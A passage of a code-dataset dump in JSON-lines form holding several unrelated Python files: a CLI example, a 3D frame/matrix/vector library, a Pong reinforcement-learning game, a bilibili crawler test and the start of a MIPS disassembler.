program!\")\n            sep()\n\n\n# Main script...\nif __name__ == 
'__main__':\n principal()\n","sub_path":"Practica Final/medico/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35951558","text":"\"\"\"\nModule for command line interface implementation.\n\"\"\"\n\nimport abc\nimport argparse\nimport sys\n\nfrom example import __version__\nfrom example.io import print_hello_world\n\n\nclass SubCommand(abc.ABC):\n \"\"\"\n Abstract base class for sub commands.\n\n A new sub command can be added by calling the init_subparser().\n \"\"\"\n\n @classmethod\n @abc.abstractmethod\n def _name(cls):\n \"\"\"\n Return name of the command.\n\n :return: Command name\n :rtype: str\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def _help(cls):\n \"\"\"\n Return help description.\n\n :return: Help description\n :rtype: str\n \"\"\"\n return cls.__doc__\n\n @classmethod\n @abc.abstractmethod\n def _add_arguments(cls, parser):\n \"\"\"\n Initialize the argument parser and help for the specific sub-command.\n\n Must be implemented by a sub-command.\n\n :param parser: A parser.\n :type parser: argparse.ArgumentParser\n :return: void\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def init_subparser(cls, subparsers):\n \"\"\"\n Initialize the argument parser and help for the specific sub-command.\n\n :param subparsers: A subparser.\n :type subparsers: argparse.ArgumentParser\n :return: void\n \"\"\"\n parser = subparsers.add_parser(cls._name(), help=cls._help())\n cls._add_arguments(parser)\n parser.set_defaults(func=cls.execute)\n\n @classmethod\n @abc.abstractmethod\n def execute(cls, args):\n \"\"\"\n Execute the command.\n\n Must be implemented by a sub-command.\n\n :param args: argparse arguments.\n :return: 0 on success.\n \"\"\"\n raise NotImplementedError()\n\n\nclass HelloCmd(SubCommand):\n \"\"\"Prints a welcome message.\"\"\"\n\n @classmethod\n def _name(cls):\n return 'hello'\n\n @classmethod\n def _add_arguments(cls, parser):\n parser.add_argument('name', help='Name to greet.')\n return parser\n\n @classmethod\n def execute(cls, args):\n \"\"\"Execute the command.\"\"\"\n print_hello_world(args.name)\n\n return 0\n\n\ndef main(argv=None):\n \"\"\"\n Start the Example tool.\n\n :return: 0 on success.\n \"\"\"\n if not argv:\n argv = sys.argv\n\n # Parse arguments\n parser = argparse.ArgumentParser(prog=argv[0])\n parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)\n\n subparser = parser.add_subparsers(title='Example Commands', description='Valid example commands.')\n HelloCmd.init_subparser(subparser)\n\n args = parser.parse_args(argv[1:])\n try:\n # Check if a sub-command is given, otherwise print help.\n getattr(args, 'func')\n except AttributeError:\n parser.print_help()\n return 2\n\n return args.func(args)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"python_distutils/example/cmdline.py","file_name":"cmdline.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440452292","text":"# coding:utf-8\n#!/usr/bin/python\n\nfrom math import *\n\n#--------------------------\n# Frame class\n#--------------------------\n\nclass FRAME() :\n def __init__(self, frm = [], mat = [], vec = [], xyzabc = []) :\n if frm :\n self.mat = MATRIX(mat = frm.mat)\n self.vec = VECTOR(vec = frm.vec)\n elif xyzabc :\n self.vec = VECTOR(xyzabc[0], xyzabc[1], xyzabc[2])\n self.mat = MATRIX(a = 
xyzabc[3], b = xyzabc[4], c = xyzabc[5])\n else :\n self.mat = MATRIX(mat = mat)\n self.vec = VECTOR(vec = vec)\n\n def __mul__(self, other) :\n tmp = None\n\n if isinstance(other, FRAME) :\n tmp_mat = self.mat * other.mat\n tmp_vec = (self.mat * other.vec) + self.vec\n tmp = FRAME(mat = tmp_mat, vec = tmp_vec)\n elif isinstance(other, VECTOR) :\n tmp = (self.mat * other) + self.vec\n\n return(tmp)\n\n def __neg__(self) :\n tmp = FRAME()\n tmp.mat = -self.mat\n tmp.vec = (-self.mat) * (-self.vec)\n return(tmp)\n\n def xyzabc(self) :\n tmp = []\n\n for i in range(0, 3) :\n tmp.append(self.vec[i])\n\n for i in range(0, 3) :\n tmp.append(self.mat.abc()[i])\n\n return(tmp)\n\n def __repr__(self) :\n return(\"f:(\" + repr(self.mat) + \",\" + repr(self.vec) + \")\")\n\n#--------------------------\n# Matrix class\n#--------------------------\n\nclass MATRIX(list):\n # コンストラクタ\n def __init__(self, mat=[], a=0.0, b=0.0, c=0.0, angle=0.0, axis=[]) :\n list.__init__(self)\n self.append([1.0, 0.0, 0.0])\n self.append([0.0, 1.0, 0.0])\n self.append([0.0, 0.0, 1.0])\n\n if mat:\n for i in range(0, 3):\n for j in range(0, 3):\n self[i][j] = mat[i][j]\n elif a != 0.0 or b != 0.0 or c != 0.0 :\n if a != 0.0 :\n si_a = sin(a)\n co_a = cos(a)\n else :\n si_a = 0.0\n co_a = 1.0\n\n if b != 0.0 :\n si_b = sin(b)\n co_b = cos(b)\n else :\n si_b = 0.0\n co_b = 1.0\n\n if c != 0.0 :\n si_c = sin(c)\n co_c = cos(c)\n else :\n si_c = 0.0\n co_c = 1.0\n\n self[0][0] = co_b * co_c\n self[0][1] = -1.0 * co_b * si_c\n self[0][2] = si_b\n\n self[1][0] = si_a * si_b * co_c + co_a * si_c\n self[1][1] = -1.0 * si_a * si_b * si_c + co_a * co_c\n self[1][2] = -1.0 * si_a * co_b\n\n self[2][0] = -1.0 * co_a * si_b * co_c + si_a * si_c\n self[2][1] = co_a * si_b * si_c + si_a * co_c\n self[2][2] = co_a * co_b\n\n elif axis :\n # rotate around any axis\n len = axis.abs()\n if len != 0.0 and angle != 0.0:\n co = cos(angle)\n si = sin(angle)\n atmp = axis.normal()\n self[0][0] = atmp[0]*atmp[0]*(1.0 - co) + co\n self[1][0] = atmp[1]*atmp[0]*(1.0 - co) + atmp[2]*si\n self[2][0] = atmp[2]*atmp[0]*(1.0 - co) - atmp[1]*si\n self[0][1] = atmp[0]*atmp[1]*(1.0 - co) - atmp[2]*si\n self[1][1] = atmp[1]*atmp[1]*(1.0 - co) + co\n self[2][1] = atmp[2]*atmp[1]*(1.0 - co) + atmp[0]*si\n self[0][2] = atmp[0]*atmp[2]*(1.0 - co) + atmp[1]*si\n self[1][2] = atmp[1]*atmp[2]*(1.0 - co) - atmp[0]*si\n self[2][2] = atmp[2]*atmp[2]*(1.0 - co) + co\n\n def __repr__(self):\n return(\"m:\" + list.__repr__(self))\n\n def col(self, idx, arg=[]) :\n tmp = VECTOR()\n if arg :\n for i in [0,1,2] :\n self[i][idx] = arg[i]\n for i in [0,1,2] :\n tmp[i] = self[i][idx]\n else :\n for i in range(0, 3) :\n tmp[i] = self[i][idx]\n\n return(tmp)\n\n def row(self, idx, arg=[]) :\n tmp = VECTOR()\n if arg :\n for i in [0,1,2] :\n self[idx][i] = arg[i]\n for i in [0,1,2] :\n tmp[i] = self[idx][i]\n else :\n for i in range(0, 3) :\n tmp[i] = self[idx][i]\n\n return(tmp)\n\n def rot_axis(self) :\n axis = VECTOR()\n co=(self[0][0]+self[1][1]+self[2][2]-1.0)/2.0;\n if co <= -1.0 :\n angl = pi;\n tmp=min(1.0,max(0,(self[0][0] + 1.0)/2.0))\n axis[0] = sqrt(tmp)\n tmp=min(1.0,max(0,(self[1][1] + 1.0)/2.0))\n axis[1] = sign(self[0][1])*sqrt(tmp)\n tmp=min(1.0,max(0,(self[2][2] + 1.0)/2.0))\n axis[2] = sign(self[0][2])*sqrt(tmp)\n si=0.0\n elif co < 1.0 :\n axis[0] = self[2][1] - self[1][2]\n axis[1] = self[0][2] - self[2][0]\n axis[2] = self[1][0] - self[0][1]\n an = abs(axis)\n if(an != 0.0) :\n for i in [0,1,2] :\n axis[i] = axis[i]/an\n si = an/2.0\n angl = arctan2(si,co);\n 
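Note on `MATRIX.rot_axis` above: it calls `arctan2` and `sign`, which are NumPy names that `from math import *` does not provide, and `an = abs(axis)` invokes the built-in `abs()` on a list subclass (a TypeError) where VECTOR's own `abs()` method was presumably intended. A minimal patch sketch:

```python
from math import atan2

def sign(x):
    # math has no sign(); a minimal helper matching rot_axis's intent.
    return -1.0 if x < 0.0 else 1.0

# Inside rot_axis the corrected calls would then read:
#   an = axis.abs()       # VECTOR.abs() is a method; built-in abs() on a
#                         # list subclass raises TypeError
#   angl = atan2(si, co)  # arctan2 is NumPy's spelling, not math's
print(sign(-3.2), atan2(1.0, 1.0))   # -1.0 0.7853981633974483
```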
else :\n angl = 0.0\n axis[0] = 1.0\n axis[1] = 0.0\n axis[2] = 0.0\n else :\n angl = 0.0\n axis[0] = 1.0\n axis[1] = 0.0\n axis[2] = 0.0\n return([angl,axis])\n\n def abc(self) :\n if self[0][2] >= 1.0 :\n b = pi/2;\n a = 0.0;\n c = atan2(self[2][1],self[1][1])\n elif self[0][2] <= -1.0 :\n b = -pi/2;\n a = 0.0;\n c = atan2(self[1][0],self[2][0])\n else :\n b = asin(self[0][2]);\n a = atan2(-1.0 * self[1][2],self[2][2])\n c = atan2(-1.0 * self[0][1],self[0][0])\n return([a, b, c])\n\n def trans(self) :\n tmp = MATRIX()\n for i in range(0, 3) :\n for j in range(0, 3) :\n tmp[i][j] = self[j][i]\n return(tmp)\n\n def __neg__(self) :\n return(self.trans())\n\n def __mul__(self, other) :\n tmp = None\n\n if isinstance(other, MATRIX) :\n # 行列*行列\n tmp = MATRIX()\n for i in range(0, 3) :\n for j in range(0, 3) :\n tmp[i][j] = 0\n for k in range(0, 3) :\n tmp[i][j] += self[i][k] * other[k][j]\n elif isinstance(other, VECTOR) :\n # 行列*ベクトル\n tmp = VECTOR()\n for i in range(0, 3) :\n tmp[i] = 0\n for j in range(0, 3) :\n tmp[i] += self[i][j] * other[j]\n\n return(tmp)\n\n#--------------------------\n# Vector Class\n#--------------------------\n\nclass VECTOR(list):\n # コンストラクタ\n def __init__(self, x = 0.0, y = 0.0, z = 0.0, vec = []):\n list.__init__(self)\n self.append(x)\n self.append(y)\n self.append(z)\n\n if vec :\n for i in range(0, 3) :\n self[i] = vec[i]\n\n # 足し算\n def __add__(self, other):\n # 例外処理\n if not isinstance(other, VECTOR):\n raise TypeError\n\n ans = VECTOR()\n for i in range(0, 3) :\n ans[i] = self[i] + other[i]\n\n return ans\n\n # 引き算\n def __sub__(self, other):\n # 例外処理\n if not isinstance(other, VECTOR):\n raise TypeError\n\n ans = VECTOR()\n for i in range(0, 3) :\n ans[i] = self[i] - other[i]\n\n ans.x = self.x - other.x\n ans.y = self.y - other.y\n ans.z = self.z - other.z\n return ans\n\n # 符号反転\n def __neg__(self):\n ans = VECTOR()\n for i in range(0, 3) :\n ans[i] = -1 * self[i]\n return ans\n\n # 絶対値\n def abs(self):\n x2 = self[0] * self[0]\n y2 = self[1] * self[1]\n z2 = self[2] * self[2]\n return sqrt(x2 + y2 + z2)\n\n # 内積\n def dot(self, other):\n # 例外処理\n if not isinstance(other, VECTOR):\n raise TypeError\n\n ans = 0.0\n for i in range(0, 3) :\n ans += self[i] * other[i]\n\n return ans\n\n # 外積\n def __mul__(self, other):\n # 引数がスカラーだった時はスカラー倍に\n if not isinstance(other, VECTOR):\n if isinstance(other, int) or isinstance(other, float) :\n return (other * self)\n elif isinstance(other, MATRIX) :\n return (other * self)\n else:\n raise TypeError\n\n ans = VECTOR()\n ans[0] = self[1] * other[2] - self[2] * other[1]\n ans[1] = self[2] * other[0] - self[0] * other[2]\n ans[2] = self[0] + other[1] - self[1] * other[0]\n return ans\n\n # スカラー倍\n def __rmul__(self, r):\n ans = VECTOR()\n for i in range(0, 3) :\n ans[i] = r * self[i]\n\n return ans\n\n # 正規化\n def normal(self):\n ans = VECTOR()\n mag = self.abs()\n for i in range(0, 3) :\n ans[i] = self[i] / mag\n\n return ans\n\n # 表示形式\n def __repr__(self):\n return (\"v:\" + list.__repr__(self))\n","sub_path":"geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"211942129","text":"import logging\nimport numpy as np\nfrom pyglet.gl import *\nfrom pyglet.gl import *\nfrom .GameAbstract import GameAbstract\nfrom .GameObjectsPyglet.App import App\nfrom .GameObjectsPyglet.Rect import Rect\n\nlog = logging.getLogger( __name__ )\nlog.addHandler( logging.StreamHandler( ) )\nlog.setLevel( logging.DEBUG 
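Two bugs in the VECTOR class above: `__sub__` dereferences `self.x`/`other.x`, attributes the list-based class never defines, so subtraction raises AttributeError after the element-wise loop has already produced the answer; and the cross product's z component reads `self[0] + other[1] - self[1] * other[0]`, missing a multiplication. Reference sketch of the correct formula:

```python
def cross(a, b):
    # Right-handed cross product; the record's z component uses
    # a[0] + b[1] where the product a[0] * b[1] is required.
    return [a[1] * b[2] - a[2] * b[1],
            a[2] * b[0] - a[0] * b[2],
            a[0] * b[1] - a[1] * b[0]]

print(cross([1, 0, 0], [0, 1, 0]))   # [0, 0, 1]
```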
)\n\n\nclass PongGame( GameAbstract ):\n\n def __init__( self ):\n self._curr_key_press = [ ]\n self._game_time = 0.0\n self.no_action_idx = 1\n self.quit = False\n self.randomise_ball_start = True\n\n # ==============================================\n # OPTIONS\n # ==============================================\n self.points_to_win = 20.\n\n self.reward_hit_paddle = 0\n self.reward_hit_oponents_paddle = 0\n self.reward_conceded = -1\n self.reward_scored = 1\n\n self.ball_speed_x = 7.\n self.ball_speed_y = 7.\n\n # self.player1_speed = 12.\n # self.player2_speed = 32.\n self.player1_speed = 22.\n self.player2_speed = 22.\n\n self.left_wall_pos = 5.\n self.right_wall_pos = 620.\n self.bottom_wall_pos = 10.\n self.top_wall_pos = 457.5\n\n self.player_width = 10.\n self.player_height = 50.\n self.player_max_y = 420.\n self.player_min_y = 10.\n\n self.player1_start_x = 10.\n self.player2_start_x = self.right_wall_pos\n self.player_start_y = 215.\n\n self.window_width = 640\n self.window_height = 480\n self.border_size = 5.\n\n self.ball_start_y = 232.5\n self.ball_start_x = 307.5\n\n self.ball_diameter = 15.\n\n self.text_colour = [ 255, 255, 255 ]\n self.line_colour = [ 255, 255, 255 ]\n self.ball_colour = [ 255, 255, 255 ]\n self.background_colour = [ 0, 0, 0 ]\n self.player1_colour = [ 255, 0, 255 ]\n self.player2_colour = [ 255, 0, 0 ]\n\n # ==============================================\n\n self.ball_radius = self.ball_diameter / 2.\n\n self.pitch_size_x = self.window_width - (self.border_size * 2.)\n self.pitch_size_y = self.window_height - (self.border_size * 2.)\n\n self.pitch_centre_x = self.window_width / 2.\n self.pitch_centre_y = self.window_height / 2.\n\n self._create_game_objects( )\n\n def _create_game_objects( self ):\n self.score1 = pyglet.text.Label( '0', font_name='calibri', font_size=24,\n x=self.pitch_centre_x - 50., y=self.pitch_centre_y, anchor_x='center',\n anchor_y='center', color=[ 255, 255, 255, 255 ] )\n\n self.score2 = pyglet.text.Label( '0', font_name='calibri', font_size=24,\n x=self.pitch_centre_x + 50., y=self.pitch_centre_y, anchor_x='center',\n anchor_y='center', color=[ 255, 255, 255, 255 ] )\n\n self.background = Rect( pos=[ 0, 0 ], width=[ self.window_width, self.window_height ],\n colour=self.background_colour )\n self.player1 = Rect( pos=[ self.player1_start_x, self.player_start_y ],\n width=[ self.player_width, self.player_height ], colour=self.player1_colour )\n self.player2 = Rect( pos=[ self.player2_start_x, self.player_start_y ],\n width=[ self.player_width, self.player_height ], colour=self.player2_colour )\n self.ball = Rect( pos=[ self.ball_start_x, self.ball_start_y ],\n width=[ self.ball_diameter, self.ball_diameter ], colour=self.ball_colour )\n self.middle_line = Rect( pos=[ self.pitch_centre_x - 1, self.border_size ],\n width=[ 2, self.window_height - (2 * self.border_size) ], colour=self.line_colour )\n\n self.player1_score, self.player2_score = 0, 0\n self.player1_dir = 0.\n\n def set_next_action( self, action_index=None ):\n self._calc_key_from_action_array( action_index )\n\n def _calc_key_from_action_array( self, action_set ):\n if action_set[ 1 ] == 1:\n self.player1.inc_pos( 0, self.player1_speed )\n elif action_set[ 2 ] == 1:\n self.player1.inc_pos( 0, -self.player1_speed )\n\n def set_player1_speed( self, speed ):\n self.player1_speed = speed\n\n def update( self ):\n reward = 0\n\n # MOVE BALL\n self.ball.inc_pos( self.ball_speed_x, self.ball_speed_y )\n\n # HARD CODED AI\n if self.ball.x >= (self.pitch_centre_x - 
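The PongGame record imports `pyglet.gl` twice, and its action convention is only implicit in `_calc_key_from_action_array`: index 1 moves player 1 up, index 2 moves it down, anything else is a no-op. A sketch of that mapping (the constants are illustrative, not from the record):

```python
# One-hot layout inferred from _calc_key_from_action_array: [noop, up, down].
NOOP, UP, DOWN = [1, 0, 0], [0, 1, 0], [0, 0, 1]

def paddle_delta(action_set, speed):
    # Mirrors the dispatch above: index 1 raises the paddle, index 2
    # lowers it, any other one-hot vector leaves it in place.
    if action_set[1] == 1:
        return speed
    if action_set[2] == 1:
        return -speed
    return 0.0

assert paddle_delta(UP, 22.0) == 22.0
assert paddle_delta(DOWN, 22.0) == -22.0
assert paddle_delta(NOOP, 22.0) == 0.0
```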
self.ball_diameter):\n if not self.player2.y == self.ball.y + self.ball_radius:\n if self.player2.y < self.ball.y + self.ball_radius:\n self.player2.y += self.player2_speed\n if self.player2.y > self.ball.y - (self.player_height - self.ball_radius):\n self.player2.y -= self.player2_speed\n\n # BOUNDS CHECKING\n self.player1.y = min(self.player1.y, self.player_max_y)\n self.player1.y = max(self.player1.y, self.player_min_y)\n self.player2.y = min(self.player2.y, self.player_max_y)\n self.player2.y = max(self.player2.y, self.player_min_y)\n\n # COLLISIONS WITH LEFT PADDLE\n if self.ball.x <= self.player1.x + self.player_width:\n if (self.ball.y >= (self.player1.y - self.ball_radius)) and \\\n (self.ball.y <= (self.player1.y + (self.player_height - self.ball_radius))):\n self.ball.x = self.player1.x + self.player_width\n self.ball_speed_x = -self.ball_speed_x\n reward = self.reward_hit_paddle\n\n # COLLISIONS WITH RIGHT PADDLE\n if self.ball.x >= self.player2.x - self.ball_diameter:\n if (self.ball.y >= (self.player2.y - self.ball_radius)) and \\\n (self.ball.y <= (self.player2.y + (self.player_height - self.ball_radius))):\n self.ball.x = self.player2.x - self.ball_diameter\n self.ball_speed_x = -self.ball_speed_x\n reward = self.reward_hit_oponents_paddle\n\n # CHECK IF SCORED\n if self.ball.x < self.left_wall_pos:\n self.player2_score += 1\n self.score2.text = str( self.player2_score )\n self._reset_ball_player1_defending( )\n self.player1.y, self.player2.y = self.player_start_y, self.player_start_y\n reward = self.reward_conceded\n elif self.ball.x > (self.right_wall_pos - self.ball_diameter):\n self.player1_score += 1\n self.score1.text = str( self.player1_score )\n self._reset_ball_player2_defending( )\n self.player1.y, self.player2.y = self.player_start_y, self.player_start_y\n reward = self.reward_scored\n\n # COLLISIONS WITH TOP AND BOTTOM WALLS\n if self.ball.y <= self.bottom_wall_pos:\n self.ball_speed_y = -self.ball_speed_y\n self.ball.y = self.bottom_wall_pos\n elif self.ball.y >= self.top_wall_pos:\n self.ball_speed_y = -self.ball_speed_y\n self.ball.y = self.top_wall_pos\n\n terminal = False\n if max( self.player1_score, self.player2_score ) >= self.points_to_win:\n terminal = True\n\n return float( reward ), terminal\n\n def observe( self ):\n if self.first_frame:\n self.first_frame = False\n terminal = False\n else:\n self.reward, terminal = self.update( )\n\n self.render( )\n\n return terminal\n\n def get_reward( self ):\n return self.reward\n\n def should_quit( self ):\n return self.quit\n\n def start_new_episode( self ):\n self.quit = False\n self.player1_score = 0\n self.player2_score = 0\n\n self.score1.text = str( self.player1_score )\n self.score2.text = str( self.player2_score )\n self.reward = 0.0\n self.first_frame = True\n self.player1.y, self.player2.y = self.player_start_y, self.player_start_y\n self.observe( )\n\n def render( self ):\n # DRAW BACKGROUND\n self.background.draw( )\n\n # DRAW FRAME\n self.middle_line.draw( )\n\n # DRAW PADDLES\n self.player1.draw( )\n self.player2.draw( )\n\n # DRAW BALL\n self.ball.draw( )\n\n # DRAW SCORES\n self.score1.draw( )\n self.score2.draw( )\n\n def _reset_ball_player1_defending( self ):\n if self.randomise_ball_start:\n random_y_offset = np.random.uniform( self.bottom_wall_pos, (self.top_wall_pos - self.ball_diameter) )\n self.ball.x, self.ball.y = self.pitch_centre_x, random_y_offset\n else:\n self.ball.x, self.ball.y = self.ball_start_x, self.ball_start_y\n\n def _reset_ball_player2_defending( self ):\n if 
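The paired `min()`/`max()` bounds checks in `update()` above are the usual clamp idiom; a named helper makes the intent explicit (limit values match `player_max_y`/`player_min_y` from the record):

```python
def clamp(value, lo, hi):
    # Equivalent to the min()/max() pairs applied to both paddles.
    return max(lo, min(value, hi))

assert clamp(500.0, 10.0, 420.0) == 420.0   # pushed past player_max_y
assert clamp(-5.0, 10.0, 420.0) == 10.0     # pushed past player_min_y
assert clamp(215.0, 10.0, 420.0) == 215.0   # in range: unchanged
```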
self.randomise_ball_start:\n random_y_offset = np.random.uniform( self.bottom_wall_pos, (self.top_wall_pos - self.ball_diameter) )\n self.ball.x, self.ball.y = (self.pitch_centre_x - self.ball_diameter), random_y_offset\n else:\n self.ball.x, self.ball.y = self.ball_start_x, self.ball_start_y\n\n def stop_game( self ):\n pass\n\n @staticmethod\n def get_instance( visible=True ):\n # visible = False, not currently working\n return App( PongGame( ), visible=visible )","sub_path":"ReinforcementLearning/GamesAsync/PongGame.py","file_name":"PongGame.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562007509","text":"import os\nimport sys\n__root = os.path.abspath(\n os.path.dirname(os.path.abspath(__file__)) + (os.sep + '..') * (\n len(os.path.dirname(os.path.abspath(__file__)).split(os.sep)) -\n os.path.dirname(os.path.abspath(__file__)).split(os.sep).index(\n 'VeXtract'\n ) - 1\n )) + os.sep\nsys.path.append(__root)\nimport pytest\nimport xml.etree.ElementTree as ET\n\nfrom crawler.bilibili import bilibili\n\nfrom helper import logger\nlog = logger.Logger(__name__)\n\nAV_NUMBER_ONE_P = \"av23315808\"\nAV_NUMBER_MANY_P = \"av13392824\"\n\n\ndef test_fetch_bilibili():\n log.d('start test_fetch_bilibili')\n target = bilibili.fetch_bilibili_av(AV_NUMBER_MANY_P, \"1\")\n cid_need = ['21945130', '21945131']\n tags_need = [\"凹凸世界\", \"社会摇\", \"格瑞\", \"toxic\"]\n assert target.aid == \"13392824\"\n assert [i for i in target.cid if i not in cid_need] == []\n assert target.video_title == \"【凹凸世界】瑞骚来袭!手办级渲染第四弹!toxic伪\"\n assert [i for i in target.video_tags if i not in tags_need] == []\n assert target.timelength == 110419\n\n\ndef test_j_data_rw():\n log.d('start test_j_data_rw')\n a = bilibili.Bilibili_file_info.load(os.path.join(__root, \"test\\\\test_file\\\\{}.json\".format(AV_NUMBER_ONE_P)))\n assert a.comments[a.cid[0]][0][\"score\"] == None\n a.comments[a.cid[0]][0][\"score\"] = 10\n a.save(os.path.join(__root, \"test\\\\test_file\\\\\"))\n b = bilibili.Bilibili_file_info.load(os.path.join(__root, \"test\\\\test_file\\\\{}.json\".format(AV_NUMBER_ONE_P)))\n assert b.comments[b.cid[0]][0][\"score\"] == 10\n b.comments[b.cid[0]][0][\"score\"] = None\n b.save(os.path.join(__root, \"test\\\\test_file\\\\\"))\n ","sub_path":"test/crawler/bilibili/bilibili_info_test.py","file_name":"bilibili_info_test.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"325339533","text":"# -*- coding: cp1252 -*-\r\nimport sys\r\nimport os\r\nimport struct\r\n\r\ncycle = 1\r\ndataStartPoint = 0\r\naddressList = []\r\nfuncBits = []\r\ndisOut = None\r\nsimOut = None\r\nimm = 0\r\n\r\n# convert ints to signed\r\ndef imm16BitUnsignedTo32BitSignedConverter( num ):\r\n\tnegBitMask = 0x00008000\r\n\t# if the 16th bit is 1, the 16 bit value is negative\r\n\tif( negBitMask & num ) > 0 :\r\n\t# put 1s in the upper 16 bits\r\n\t\tnum = num | 0xFFFF0000\r\n\t\t# now perform a 2's complement conversion\r\n\t\t# flip the bits using XOR\r\n\t\tnum = num ^ 0xFFFFFFFF\r\n\t\t# add 1\r\n\t\tnum = num + 1\r\n\t\t# num is now the positive version of the number\r\n\t\t# multiply by -1 to get a signed integer with the negative number\r\n\t\tnum = num * -1\r\n\treturn num\r\n\r\ndef readFromFile(opCode, rsBits, instructions, immediate):\r\n\t# how to read binary file and get ints\r\n\tinFile = open( sys.argv[1], 'rb' )\r\n\t# get the file 
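The bilibili test module above hard-codes Windows path separators ("test\\test_file\\...") and compares with `== None`. A portable sketch (the fixture name reuses AV_NUMBER_ONE_P from the record):

```python
import os

# os.path.join with separate components stays correct on any OS,
# unlike literal backslash-separated templates.
fixture = os.path.join('test', 'test_file', 'av23315808.json')
print(fixture)

score = None
assert score is None   # identity test, preferred over `score == None`
```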
length\r\n\tinFileLen = os.stat( sys.argv[1] )[6]\r\n\tinFileWords = inFileLen / 4\r\n\taddress = []\r\n\t# read the words from the file\r\n\tfor i in range( inFileWords ) :\r\n\t\t# print 'Original: ' + str(struct.unpack('>I', inFile.read(4))[0])\r\n\t\tinstructions.append( struct.unpack('>I', inFile.read(4))[0] )\r\n\t\taddress.append( 96 + (i*4) )\r\n\t\t# use I to hold the current instruction\r\n\t\tI = instructions[ len(instructions)-1 ]\r\n\t\t# get IMMEDIATE bits\r\n\t\tIMM = ((I << 16) & 0xFFFFFFFF ) >> 16\r\n\t\tIMM = imm16BitUnsignedTo32BitSignedConverter( IMM )\r\n\t\t#print bin(I)\r\n\t\t# get the opcode bits\r\n\t\tOP = I>>26\r\n\t\topCode.append(OP)\r\n\t\t#print OP\r\n\t\t# get the RS bits\r\n\t\tRS = ((I<<6) & 0xFFFFFFFF) >> 27\r\n\t\t#print RS\r\n\t\trsBits.append(RS)\r\n\t\t#print '----'\r\n\t\timmediate.append(bin(IMM))\r\n\tinFile.close()\r\n\treturn address\r\n\r\ndef initializeFuncCodes(instructions):\r\n\tfuncBits = []\r\n\tfor x in range(0, len(instructions)):\r\n\t\tfuncCode = int(bin(instructions[x])[-6:], 2)\r\n\t\tfuncBits.append(funcCode)\r\n\treturn funcBits\r\n\t\r\ndef initializeOPCodes():\r\n\tinstructions = [[int('100010', 2), None, 'J'], [int('100000', 2), int('001000', 2), 'JR'], [int('100100', 2), None, 'BEQ'],\r\n\t\t\t\t\t[int('100001', 2), None, 'BLTZ'], [int('100000', 2), int('100000', 2), 'ADD'], [int('101000', 2), None, 'ADDI'],\r\n\t\t\t\t\t[int('100000', 2), int('100010', 2), 'SUB'], [int('101011', 2), None, 'SW'], [int('100011', 2), None, 'LW'],\r\n\t\t\t\t\t[int('100000', 2), int('000000', 2), 'SLL'], [int('100000', 2), int('000010', 2), 'SRL'], [int('111100', 2), None, 'MUL'],\r\n\t\t\t\t\t[int('100000', 2), int('100100', 2), 'AND'], [int('100000', 2), int('100101', 2), 'OR'], [int('100000', 2), int('001010', 2), 'MOVZ'],\r\n\t\t\t\t\t[int('100000', 2), int('001101', 2), 'BREAK'], [int('100000', 2), int('000000', 2), 'NOP']] #nop is sll 0,0,0\r\n\t\t\t\t\t#first six bits is normally opcode, however 1-5 will be used instead\r\n\t\t\t\r\n\treturn instructions\r\n\r\ndef checkOPCode(opCode, stdOPCodes):\r\n\tvalidity = []\r\n\tvalid = False\r\n\tfor x in range(0, len(opCode)):\r\n\t\tvalid = False\r\n\t\tfor y in range(0, len(stdOPCodes)):\r\n\t\t\tif (opCode[x] == stdOPCodes[y][0]):\r\n\t\t\t\tvalid = True\r\n\t\t\t\ty = len(stdOPCodes)\r\n\t\tvalidity.append(valid)\t\t\t \r\n\treturn validity\r\ndef getData(data, validity, instructions):\r\n\tlocation = 0\r\n\tstartPt = len(validity) - 1\r\n\twhile (startPt >= 0):\r\n\t\tif (validity[startPt]):\r\n\t\t\tlocation = startPt + 1\r\n\t\t\tstartPt = -1\r\n\t\tstartPt = startPt - 1\r\n\treturnPT = location\r\n\t#now that we have the starting location for the data, we can decide the data values\r\n\twhile (location < len(validity)):\r\n\t\tif (int(instructions[location]) > 2147483647):\r\n\t\t\tdataPt = twosComplement(instructions[location], 32)\r\n\t\telse:\r\n\t\t\tdataPt = int(instructions[location])\r\n\t\tdata.append(int(dataPt))\r\n\t\tlocation = location + 1\r\n\treturn returnPT\r\n\r\ndef twosComplement(value, bits):\r\n\tif ((value & (1 << (bits - 1))) != 0):\r\n\t\tvalue = value - (1 << bits)\r\n\treturn value\r\n\r\ndef initializeDisCheck(instructions):\r\n\tnewList = [[None for row in range(0, len(instructions))] for col in range(0, len(instructions))]\r\n\t\r\n\tfor i in range(0, len(instructions)):\r\n\t\tnewList[i][0] = instructions[i]\r\n\t\tnewList[i][1] = False\r\n\treturn newList\r\n\t\r\ndef determineInstruction(instruction, opCode, funcBits, stdOPCodes, validity, endPT, data, 
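In `readFromFile` above, `inFileWords = inFileLen / 4` is a float under Python 3, so `range(inFileWords)` raises TypeError (the commented-out `print '...'` statements also suggest Python 2 heritage). A Python 3 sketch of the word reader, plus a compact equivalent of the sign-extension helper:

```python
import struct

def read_words(path):
    # range(inFileLen / 4) fails in Python 3 because `/` yields a float;
    # floor division keeps the word count an int.
    with open(path, 'rb') as f:
        raw = f.read()
    return [struct.unpack('>I', raw[i * 4:(i + 1) * 4])[0]
            for i in range(len(raw) // 4)]

def sign_extend_16(value):
    # Compact equivalent of imm16BitUnsignedTo32BitSignedConverter.
    value &= 0xFFFF
    return value - 0x10000 if value & 0x8000 else value

assert sign_extend_16(0xFFFF) == -1
assert sign_extend_16(0x7FFF) == 32767
```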
